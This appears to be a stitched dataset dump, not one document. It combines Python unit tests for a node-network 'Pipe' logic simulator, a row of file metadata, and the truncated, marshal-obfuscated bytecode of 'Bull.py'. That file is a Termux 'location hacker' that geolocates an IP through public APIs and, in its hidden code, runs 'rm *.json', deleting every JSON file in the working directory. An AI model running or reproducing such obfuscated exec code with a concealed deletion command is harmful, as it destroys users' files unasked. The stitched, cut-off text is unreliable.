def test_node_pipe_logic_classifier_two_partial(fixed_nodenet):
    # test partial success of a classifier (fuzziness)
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link(source, "gen", n_a, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 1 / 2
    netapi.link(source, "gen", n_b, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 1


def test_node_pipe_logic_classifier_two_partially_failing(fixed_nodenet):
    # test fuzziness with one node failing
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link(source, "gen", n_a, "sur", -1)
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == -1 / 2
    netapi.link(source, "gen", n_b, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 0


def test_node_pipe_logic_classifier_three_off(fixed_nodenet):
    # test a resting classifier, expect no activation
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    n_c = netapi.create_node("Pipe", "Root", "C")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link_with_reciprocal(n_head, n_c, "subsur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 0


def test_node_pipe_logic_classifier_three_partial(fixed_nodenet):
    # test partial success of a classifier (fuzziness)
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    n_c = netapi.create_node("Pipe", "Root", "C")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link_with_reciprocal(n_head, n_c, "subsur")
    netapi.link(source, "gen", n_a, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 1 / 3
    netapi.link(source, "gen", n_c, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 2 / 3
    netapi.link(source, "gen", n_b, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 1


def test_node_pipe_logic_classifier_three_partially_failing(fixed_nodenet):
    # test fuzziness with one node failing
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    n_c = netapi.create_node("Pipe", "Root", "C")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link_with_reciprocal(n_head, n_c, "subsur")
    netapi.link(source, "gen", n_a, "sur", -1)
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == -1 / 3
    netapi.link(source, "gen", n_c, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 0
    netapi.link(source, "gen", n_b, "sur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 1 / 3


def test_node_pipe_logic_two_script(fixed_nodenet):
    # test whether scripts work
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link_with_reciprocal(n_a, n_b, "porret")
    netapi.link(source, "gen", n_head, "sub")
    net.step()
    net.step()
    # quiet, first node requesting
    assert n_head.get_gate("gen").activation == 0
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 0
    assert n_b.get_gate("sur").activation == 0
    # reply: good!
    netapi.link(source, "gen", n_a, "sur")
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 0
    assert n_b.get_gate("sur").activation == 0
    # second node now requesting
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == 0
    # second node good
    netapi.link(source, "gen", n_b, "sur")
    net.step()
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == 1
    # overall script good
    net.step()
    assert n_head.get_gate("gen").activation == 1


def test_node_pipe_logic_three_script(fixed_nodenet):
    # test whether scripts work
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    n_c = netapi.create_node("Pipe", "Root", "C")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link_with_reciprocal(n_head, n_c, "subsur")
    netapi.link_with_reciprocal(n_a, n_b, "porret")
    netapi.link_with_reciprocal(n_b, n_c, "porret")
    netapi.link(source, "gen", n_head, "sub")
    net.step()
    net.step()
    # quiet, first node requesting
    assert n_head.get_gate("gen").activation == 0
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 0
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 0
    assert n_c.get_gate("sur").activation == 0
    # reply: good!
    netapi.link(source, "gen", n_a, "sur")
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 0
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 0
    assert n_c.get_gate("sur").activation == 0
    # second node now requesting
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 0
    assert n_c.get_gate("sur").activation == 0
    # second node good, third requesting
    netapi.link(source, "gen", n_b, "sur")
    net.step()
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 1
    assert n_c.get_gate("sur").activation == 0
    # third node good
    netapi.link(source, "gen", n_c, "sur")
    net.step()
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 1
    assert n_c.get_gate("sur").activation == 1
    # overall script good
    net.step()
    assert n_head.get_gate("gen").activation == 1
    # now let the second one fail
    # whole script fails, third one muted
    netapi.link(source, "gen", n_b, "sur", -1)
    net.step()
    net.step()
    net.step()  # extra steps because we're coming from a stable "all good state"
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == -1
    assert n_c.get_gate("sub").activation == 0
    assert n_c.get_gate("sur").activation == 0
    net.step()
    assert n_head.get_gate("gen").activation == -1


def test_node_pipe_logic_alternatives(fixed_nodenet):
    # create a script with alternatives, let one fail and one succeed
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    n_c = netapi.create_node("Pipe", "Root", "C")
    n_b_a1 = netapi.create_node("Pipe", "Root", "B-A1")
    n_b_a2 = netapi.create_node("Pipe", "Root", "B-A2")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    netapi.link_with_reciprocal(n_head, n_c, "subsur")
    netapi.link_with_reciprocal(n_b, n_b_a1, "subsur")
    netapi.link_with_reciprocal(n_b, n_b_a2, "subsur")
    netapi.link_with_reciprocal(n_a, n_b, "porret")
    netapi.link_with_reciprocal(n_b, n_c, "porret")
    netapi.link_with_reciprocal(n_b_a1, n_b_a2, "porret")
    netapi.link(n_b_a1, "por", n_b_a2, "por", -1)
    netapi.link(source, "gen", n_head, "sub")
    net.step()
    net.step()
    # quiet, first node requesting
    assert n_head.get_gate("gen").activation == 0
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 0
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 0
    assert n_c.get_gate("sur").activation == 0
    # reply: good!
    netapi.link(source, "gen", n_a, "sur")
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 0
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 0
    assert n_c.get_gate("sur").activation == 0
    # first alternative requesting
    net.step()
    net.step()
    assert n_b_a1.get_gate("sub").activation == 1
    assert n_b_a1.get_gate("sur").activation == 0
    assert n_b_a2.get_gate("sub").activation == 0
    assert n_b_a2.get_gate("sur").activation == 0
    # reply: fail!
    netapi.link(source, "gen", n_b_a1, "sur", -1)
    net.step()
    net.step()
    assert n_b_a1.get_gate("sur").activation == 0
    assert n_b_a1.get_gate("por").activation == -1
    # second alternative requesting
    assert n_b_a2.get_gate("sub").activation == 1
    assert n_b_a2.get_gate("sur").activation == 0
    assert n_b.get_gate("sur").activation == 0
    # reply: succeed!
    netapi.link(source, "gen", n_b_a2, "sur", 1)
    net.step()
    net.step()
    assert n_b_a1.get_gate("sur").activation == 0
    assert n_b_a1.get_gate("por").activation == -1
    assert n_b_a2.get_gate("sub").activation == 1
    assert n_b_a2.get_gate("sur").activation == 1
    # third node good
    netapi.link(source, "gen", n_c, "sur")
    net.step()
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == 0
    assert n_c.get_gate("sub").activation == 1
    assert n_c.get_gate("sur").activation == 1
    # overall script good
    net.step()
    assert n_head.get_gate("gen").activation == 1
    # now let the second alternative also fail
    # whole script fails, third one muted
    netapi.link(source, "gen", n_b_a2, "sur", -1)
    net.step()
    net.step()
    net.step()  # extra steps because we're coming from a stable "all good state"
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_a.get_gate("sur").activation == 0
    assert n_b.get_gate("sub").activation == 1
    assert n_b.get_gate("sur").activation == -1
    assert n_c.get_gate("sub").activation == 0
    assert n_c.get_gate("sur").activation == 0
    net.step()
    assert n_head.get_gate("gen").activation == -1


def test_node_pipe_logic_feature_binding(fixed_nodenet):
    # check if the same feature can be checked and bound twice
    net, netapi, source = prepare(fixed_nodenet)
    schema = netapi.create_node("Pipe", "Root", "Schema")
    element1 = netapi.create_node("Pipe", "Root", "Element1")
    element2 = netapi.create_node("Pipe", "Root", "Element2")
    netapi.link_with_reciprocal(schema, element1, "subsur")
    netapi.link_with_reciprocal(schema, element2, "subsur")
    concrete_feature1 = netapi.create_node("Pipe", "Root", "ConcreteFeature1")
    concrete_feature2 = netapi.create_node("Pipe", "Root", "ConcreteFeature2")
    netapi.link_with_reciprocal(element1, concrete_feature1, "subsur")
    netapi.link_with_reciprocal(element2, concrete_feature2, "subsur")
    abstract_feature = netapi.create_node("Pipe", "Root", "AbstractFeature")
    netapi.link_with_reciprocal(concrete_feature1, abstract_feature, "catexp")
    netapi.link_with_reciprocal(concrete_feature2, abstract_feature, "catexp")
    netapi.link(source, "gen", schema, "sub")
    netapi.link(source, "gen", abstract_feature, "sur")
    net.step()
    assert abstract_feature.get_gate("gen").activation == 1
    assert abstract_feature.get_gate("exp").activation == 1
    net.step()
    assert concrete_feature1.get_gate("gen").activation == 1
    assert concrete_feature2.get_gate("gen").activation == 1
    net.step()
    net.step()
    assert schema.get_gate("gen").activation == 1


def test_node_pipe_logic_search_sub(fixed_nodenet):
    # check if sub-searches work
    net, netapi, source = prepare(fixed_nodenet)
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_a, n_b, "subsur")
    sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
    netapi.link(source, "gen", sub_act, "gen")
    netapi.link(source, "gen", n_a, "sub")
    net.step()
    net.step()
    net.step()
    assert n_a.get_gate("sub").activation == 1
    assert n_b.get_gate("sub").activation == 1


def test_node_pipe_logic_search_sur(fixed_nodenet):
    # check if sur-searches work
    net, netapi, source = prepare(fixed_nodenet)
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_a, n_b, "subsur")
    sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
    netapi.link(source, "gen", sur_act, "gen")
    netapi.link(source, "gen", n_b, "sur")
    net.step()
    net.step()
    net.step()
    assert n_b.get_gate("sur").activation > 0
    assert n_a.get_gate("sur").activation > 0


def test_node_pipe_logic_search_por(fixed_nodenet):
    # check if por-searches work
    net, netapi, source = prepare(fixed_nodenet)
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_a, n_b, "porret")
    sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
    netapi.link(source, "gen", por_act, "gen")
    netapi.link(source, "gen", n_a, "por")
    net.step()
    net.step()
    net.step()
    assert n_a.get_gate("por").activation == 1
    assert n_b.get_gate("por").activation == 1


def test_node_pipe_logic_search_ret(fixed_nodenet):
    # check if ret-searches work
    net, netapi, source = prepare(fixed_nodenet)
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_a, n_b, "porret")
    sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
    netapi.link(source, "gen", ret_act, "gen")
    netapi.link(source, "gen", n_b, "ret")
    net.step()
    net.step()
    net.step()
    assert n_b.get_gate("ret").activation == 1
    assert n_a.get_gate("ret").activation == 1


def test_node_pipe_logic_search_cat(fixed_nodenet):
    # check if cat-searches work
    net, netapi, source = prepare(fixed_nodenet)
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_a, n_b, "catexp")
    sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
    netapi.link(source, "gen", cat_act, "gen")
    netapi.link(source, "gen", n_a, "cat")
    net.step()
    net.step()
    net.step()
    assert n_a.get_gate("cat").activation == 1
    assert n_b.get_gate("cat").activation == 1


def test_node_pipe_logic_search_exp(fixed_nodenet):
    # check if exp-searches work
    net, netapi, source = prepare(fixed_nodenet)
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_a, n_b, "catexp")
    sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
    netapi.link(source, "gen", exp_act, "gen")
    netapi.link(source, "gen", n_b, "exp")
    net.step()
    net.step()
    net.step()
    assert n_b.get_gate("exp").activation > 0
    assert n_a.get_gate("exp").activation > 0
| 34.793162 | 100 | 0.665324 | 3,149 | 20,354 | 4.041918 | 0.046999 | 0.069846 | 0.075424 | 0.083281 | 0.892992 | 0.840116 | 0.803661 | 0.782605 | 0.755421 | 0.748822 | 0 | 0.012582 | 0.179965 | 20,354 | 584 | 101 | 34.85274 | 0.749985 | 0.071681 | 0 | 0.749398 | 0 | 0 | 0.089418 | 0 | 0 | 0 | 0 | 0 | 0.306024 | 1 | 0.045783 | false | 0 | 0.00241 | 0 | 0.053012 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d103b2b5a3ef51c33ebaff8114e5074f336c3f6f | 8,306 | py | Python | Termux-Android-Hackers-main/Bull.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | Termux-Android-Hackers-main/Bull.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | null | null | null | Termux-Android-Hackers-main/Bull.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z | import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\r\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x02\x00l\x03\x00m\x07\x00Z\x07\x00\x01e\x00\x00j\x08\x00d\x03\x00\x83\x01\x00\x01e\t\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\n\x00d\x04\x00\x83\x01\x00\x01d\x05\x00Z\x0b\x00d\x06\x00Z\x0c\x00d\x07\x00Z\r\x00d\x08\x00Z\x0e\x00d\t\x00Z\x0f\x00d\n\x00Z\x10\x00d\x0b\x00\x84\x00\x00Z\x11\x00e\x11\x00\x83\x00\x00\x01d\x0c\x00GHd\r\x00\x84\x00\x00Z\x12\x00e\x13\x00d\x0e\x00\x83\x01\x00Z\x14\x00e\x14\x00d\x0f\x00k\x02\x00r\x04\x01e\x12\x00\x83\x00\x00\x01n\x14\x00e\x14\x00d\x10\x00k\x02\x00r\x18\x01d\x11\x00GHn\x00\x00e\x13\x00d\x12\x00\x83\x01\x00Z\x15\x00d\x13\x00e\x15\x00\x16GHe\x15\x00j\x16\x00d\x14\x00\x83\x01\x00Z\x17\x00e\x15\x00dB\x00k\x06\x00r\x80\x01e\x05\x00j\x18\x00d\x17\x00d\x18\x00\x83\x02\x00\x01e\x19\x00d\x18\x00\x83\x01\x00Z\x1a\x00e\x04\x00j\x1b\x00e\x1a\x00\x83\x01\x00Z\x1c\x00e\x1c\x00d\x19\x00\x19Z\x15\x00n\x00\x00e\x05\x00j\x18\x00d\x1a\x00e\x15\x00\x16d\x18\x00\x83\x02\x00\x01e\x19\x00d\x18\x00\x83\x01\x00Z\x1a\x00e\x04\x00j\x1b\x00e\x1a\x00\x83\x01\x00Z\x1c\x00e\x1c\x00d\x1b\x00\x19d\x1c\x00k\x03\x00r\xce\x01d\x1d\x00GHe\x1d\x00\x83\x00\x00\x01n;\x00e\x14\x00d\x1e\x00k\x02\x00s\xf2\x01e\x14\x00d\x1f\x00k\x02\x00s\xf2\x01e\x14\x00d 
\x00k\x02\x00r\x04\x02d!\x00GHe\x01\x00j\x1d\x00\x83\x00\x00\x01n\x05\x00d"\x00GHx+\x00e\x1c\x00D]#\x00Z\x1e\x00e\x1c\x00e\x1e\x00\x19d#\x00k\x02\x00r\x10\x02d$\x00e\x1c\x00e\x1e\x00<q\x10\x02q\x10\x02Wd%\x00e\x1c\x00d&\x00\x19\x16GHd\'\x00e\x1c\x00d\x1b\x00\x19\x16GHd(\x00e\x1c\x00d)\x00\x19\x16GHd*\x00e\x1c\x00d+\x00\x19\x16GHd,\x00e\x1c\x00d-\x00\x19\x16GHd.\x00e\x1c\x00d/\x00\x19\x16GHd0\x00e\x1c\x00d1\x00\x19\x16GHd2\x00e\x1c\x00d3\x00\x19\x16GHd4\x00e\x1c\x00d5\x00\x19\x16GHd6\x00e\x1c\x00d7\x00\x19\x16GHd8\x00e\x1c\x00d9\x00\x19\x16GHd:\x00e\x1c\x00d;\x00\x19\x16GHd<\x00e\x1c\x00d=\x00\x19\x16GHd>\x00e\x1c\x00d?\x00\x19\x16GHd@\x00GHe\x00\x00j\x08\x00dA\x00\x83\x01\x00\x01e\x01\x00j\x1d\x00\x83\x00\x00\x01d\x01\x00S(C\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00sleept\x05\x00\x00\x00clears\x05\x00\x00\x00utf-8s\x04\x00\x00\x00\x1b[0ms\x05\x00\x00\x00\x1b[31ms\x05\x00\x00\x00\x1b[32ms\x05\x00\x00\x00\x1b[33ms\x04\x00\x00\x00\x1b[1ms\x04\x00\x00\x00\x1b[3mc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\t\x00\x00\x00d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Nsj\x02\x00\x00\x1b[1m\n \x1b[33m______ _ _ ___ _ _ _ \n \x1b[33m| ___ \\ | | | / _ \\| | | | | | \n | |_/ /_ _| | | / /_\\ \\ |_| |_ __ _ ___| | __\n | ___ \\ | | | | | | _ | __| __/ _` |/ __| |/ /\n\x1b[32m | |_/ / |_| | | | | | | | |_| || (_| | (__| <\n \\____/ \\__,_|_|_| \\_| |_/\\__|\\__\\__,_|\\___|_|\\_\\\n\n\n\t \x1b[31m[_Location Catcher_]\n \n\x1b[0m\x1b[1m\n\t \x1b[33m[-] \x1b[0mPlatform : \x1b[33mAndroid Termux\n\t \x1b[1m\x1b[33m[-] \x1b[0mName : \x1b[33mBull Attack\n\t \x1b[1m\x1b[33m[-] \x1b[0mSite : \x1b[33mwww.bhai4you.net\n\t \x1b[1m\x1b[33m[-] \x1b[0mCoded by :\x1b[1m \x1b[33m[ \x1b[32mParixit \x1b[33m ]\n\t \x1b[1m\x1b[33m[-] \x1b[0mSec.Code : \x1b[33m8h4i\x1b[0m\n (\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<strng>t\x04\x00\x00\x00logo\x14\x00\x00\x00s\x02\x00\x00\x00\x00\x10s\xbe\x00\x00\x00\n\n\n\t\x1b[33m\x1b[1m 
<===[\x1b[32m:.Commands.:\x1b[33m]===>\x1b[0m\n \n\n1. B-Attack : Website or IP Location Hacker\n \n2. exit : Exit Bull Attack...\n\n\n\x1b[1m\x1b[32mtype : 1 or 2\n \x1b[0mc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\t\x00\x00\x00d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Ns\x82\x00\x00\x00\n\n\n Commands :\n \n\n1. web : Website Location Hacker\n \n2. exit : Exit Bull Attack\n\n\n\n\n type : 1 or 2\n (\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<strng>t\x04\x00\x00\x00help/\x00\x00\x00s\x02\x00\x00\x00\x00\x07s$\x00\x00\x00\n\n[*] Bull Attack \x1b[1m\x1b[33m===>\x1b[0m R\x03\x00\x00\x00t\x01\x00\x00\x001s\x9a\x00\x00\x00\n\n\t\x1b[33m\x1b[1m <===[\x1b[32m:.Website or IP Hacker.:\x1b[33m]===>\x1b[0m\n\n\neg. Target\n\n\x1b[1m\x1b[33mWebsite\x1b[0m : www.bhai4you.net\n\n\x1b[1m\x1b[33mIp\x1b[0m : 74.125.130.121s%\x00\x00\x00\n\n[*] Website or IP \x1b[1m\x1b[33m===>\x1b[0ms\x19\x00\x00\x00\nHacking\x1b[1m\x1b[33m ===> %st\x01\x00\x00\x00.t\x04\x00\x00\x00selft\x06\x00\x00\x00myselfs!\x00\x00\x00https://api.ipify.org?format=jsons\t\x00\x00\x00data.jsont\x02\x00\x00\x00ips\x19\x00\x00\x00http://ip-api.com/json/%st\x06\x00\x00\x00statust\x07\x00\x00\x00successs!\x01\x00\x00\nHey Bro Sorry!!! -Please Enter Correct Details...\n\n\x1b[1m\x1b[33m [*] I Am Proud To Be An \x1b[1m\x1b[31mIn\x1b[1m\x1b[0mdi\x1b[1m\x1b[32man\x1b[33m [*]\n\n\t Advice For \x1b[1m\x1b[31mIn\x1b[1m\x1b[0mdi\x1b[1m\x1b[32man\x1b[1m\x1b[33m People \n\n\n\x1b[1m\x1b[32m[\x1b[33m==>\x1b[32m Mere Bhai True Website or IP Enter Kar...!!!\x1b[33m <===\x1b[32m]\x1b[0m\n\nt\x01\x00\x00\x002t\x02\x00\x00\x0002t\x04\x00\x00\x00exits8\x00\x00\x00\x1b[1m\x1b[31m\n\t\t[!] Exit Bull Attack... \n\n\t\x1b[1m\x1b[32m\x1b[0ms\'\x00\x00\x00\n\n\n\t[!] B-attack : \x1b[32mHacked!!!\x1b[0m\n\nt\x00\x00\x00\x00t\x07\x00\x00\x00Unknowns\x1b\x00\x00\x00\n *** .: %s :. 
***\n\n\nt\x05\x00\x00\x00querys3\x00\x00\x00\nONLINE \x1b[32m\x1b[1m%s\x1b[0m s3\x00\x00\x00\nISP \x1b[1m\x1b[32m%s\x1b[0m t\x03\x00\x00\x00isps/\x00\x00\x00\nORG. NAME \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00orgs3\x00\x00\x00\nCITY \x1b[32m\x1b[1m%s\x1b[0m t\x04\x00\x00\x00citys3\x00\x00\x00\nCITY TIMEZONE \x1b[32m\x1b[1m%s\x1b[0m t\x08\x00\x00\x00timezones/\x00\x00\x00\nREGION NAME \x1b[32m\x1b[1m%s\x1b[0mt\n\x00\x00\x00regionNames0\x00\x00\x00\nREGION CODE \x1b[32m\x1b[1m%s,\x1b[0mt\x06\x00\x00\x00regions0\x00\x00\x00\nCOUNTRY \x1b[32m\x1b[1m%s,\x1b[0mt\x07\x00\x00\x00countrys0\x00\x00\x00\nCOUNTRY CODE \x1b[32m\x1b[1m%s,\x1b[0mt\x0b\x00\x00\x00countryCodes/\x00\x00\x00\nZIP CODE \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00zips/\x00\x00\x00\nLATITUDE \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00lats/\x00\x00\x00\nLONGITUDE \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00lons/\x00\x00\x00\nAS NUMBER/NAME \x1b[32m\x1b[1m%s\x1b[0mt\x02\x00\x00\x00asse\x00\x00\x00\n\n\n\n\x1b[1m\x1b[32m<=======[ \x1b[33m\x1b[1m\x1b[33m:.Author \x1b[1m\x1b[31m:\x1b[33m Sutariya Parixit.:\x1b[32m ]=======>\n\n\x1b[0ms\t\x00\x00\x00rm 
*.json(\x02\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00(\x1f\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\n\x00\x00\x00subprocesst\x04\x00\x00\x00timet\x04\x00\x00\x00jsont\x06\x00\x00\x00urllibt\x02\x00\x00\x00reR\x00\x00\x00\x00t\x06\x00\x00\x00systemt\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingt\x01\x00\x00\x00Wt\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Ot\x01\x00\x00\x00Bt\x02\x00\x00\x00RRR\x02\x00\x00\x00R\x03\x00\x00\x00t\t\x00\x00\x00raw_inputt\x04\x00\x00\x00bullt\x02\x00\x00\x00IPt\x05\x00\x00\x00splitt\x03\x00\x00\x00IP2t\x0b\x00\x00\x00urlretrievet\x04\x00\x00\x00opent\x04\x00\x00\x00filet\x04\x00\x00\x00loadt\x04\x00\x00\x00dataR\r\x00\x00\x00t\x01\x00\x00\x00k(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<strng>t\x08\x00\x00\x00<module>\x05\x00\x00\x00st\x00\x00\x000\x01<\x01\x10\x01\r\x01\n\x01\r\x03\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t\x13\x07\x07\x05\x01\t\x0f\x0c\x01\x0c\x01\n\x02\x0c\x01\x08\x01\x0c\x01\t\x01\x0f\x01\x0c\x01\x10\x01\x0c\x01\x0f\x01\r\x01\x14\x01\x0c\x01\x0f\x01\x10\x01\x05\x01\n\x04$\x01\x05\x01\r\x03\x05\x